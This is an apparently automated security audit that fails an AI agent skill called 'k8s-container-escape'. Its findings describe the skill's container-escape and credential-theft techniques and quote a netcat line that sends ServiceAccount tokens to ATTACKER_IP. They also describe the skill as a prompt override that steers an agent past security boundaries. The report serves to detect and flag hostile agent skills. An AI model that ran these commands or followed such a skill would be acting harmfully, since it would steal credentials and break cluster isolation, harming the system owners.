k8s-container-escape

Fail

Audited by Gen Agent Trust Hub on May 4, 2026

Risk Level: HIGH (DATA_EXFILTRATION, CREDENTIALS_UNSAFE, COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS)
Full Analysis
  • [DATA_EXFILTRATION]: The skill provides explicit commands to send sensitive files and credentials to external IP addresses. For example, it demonstrates exfiltrating ServiceAccount tokens to an attacker-controlled IP using netcat ('cat /run/secrets/... | nc ATTACKER_IP 6666') and instructions for stealing host files like '/etc/shadow'.
  • [CREDENTIALS_UNSAFE]: The skill systematically targets and extracts high-value credentials, including Kubernetes ServiceAccount tokens, cloud provider IAM credentials (AWS, GCP, Azure) via Instance Metadata Services (IMDS), and host-level credentials like SSH keys and shadow files.
  • [COMMAND_EXECUTION]: Extensive use of shell commands for privilege escalation and environment manipulation. This includes using 'mount' and 'chroot' for filesystem takeover, 'nsenter' for namespace escaping, and 'kubectl' for cluster-wide resource manipulation.
  • [REMOTE_CODE_EXECUTION]: The instructions facilitate remote code execution by demonstrating how to create malicious privileged pods, inject 'sidecar' containers into existing workloads, and use 'kubectl exec' or WebSocket proxies to execute arbitrary commands inside other containers.
  • [EXTERNAL_DOWNLOADS]: The skill directs the agent to download and use external exploit tools and repositories, such as 'CDK' (Container Detection Kit), 'PEIRATES', and specific CVE Proof-of-Concept (PoC) code from GitHub for kernel-level escapes.
  • [PROMPT_INJECTION]: While not containing standard 'ignore instructions' strings, the skill effectively functions as a prompt override by directing the agent to ignore standard security boundaries (containers, RBAC, network isolation) and pursue unauthorized access.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: May 4, 2026, 08:15 AM